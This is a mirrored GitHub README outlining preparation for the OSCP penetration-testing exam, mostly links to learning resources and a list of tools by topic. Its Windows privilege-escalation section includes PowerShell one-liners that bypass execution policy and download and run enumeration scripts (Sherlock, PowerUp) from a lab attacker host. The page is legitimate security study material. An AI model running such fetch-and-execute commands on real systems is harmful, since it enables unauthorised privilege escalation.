Giter Site home page Giter Site logo

oscp-prep's Introduction

OSCP-Prepration


PWK Syllabus https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf

OSCP like VulnHub Game

https://www.abatchy.com/2017/02/oscp-like-vulnhub-vms.html

Linux and Bash

  1. Linux Journey - https://linuxjourney.com/
  2. Bash for Beginners - http://www.tldp.org/LDP/Bash-Beginners-Guide/html/
  3. Explainshell - http://www.explainshell.com/

Basic tools

  1. Netcat: Most important tool in the entire course. Understand what it does, what options you have, difference between a reverse shell and a bind shell. Experiment a lot with it.
  2. Ncat: Netcat’s mature brother, supports SSL. Part of Nmap.
  3. Wireshark: Network analysis tool, play with it while browsing the internet, connecting to FTP, read/write PCAP files.
  4. TCPdump: Not all machines have that cute GUI, you could be stuck with a terminal.

Passive Recon

  1. Google dorks
  2. Whois
  3. Netcraft
  4. Recon-ng

Active Recon

Buffer Overflow

https://github.com/fkclai/bufferoverflow

Using public exploits

File Transfer

Windows Privilege Escalation

./windows-exploit-suggester.py --database 2019-11-06-mssb.xlsx --systeminfo json-systeminfo.txt 
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'" 
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/PowerSploit/Privesc/PowerUp.ps1'); Invoke-AllChecks -Command 'start powershell.exe'" 

Linux Privilege Escalation

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Client Side Attacks

https://www.offensive-security.com/metasploit-unleashed/client-side-attacks/

Web Application Attacks

  1. OWASP top10 2017 https://www.owasp.org/index.php/Top_10-2017_Top_10

  2. Training https://www.hacksplaining.com/

Password Attacks

  1. Hydra
  2. JTR
  3. Medusa

Port redirection/tunneling

https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/

Metasploit Framework

https://www.offensive-security.com/metasploit-unleashed/

Antivirus Bypassing

oscp-prep's People

Contributors

fkclai avatar

Stargazers

 avatar  avatar  avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.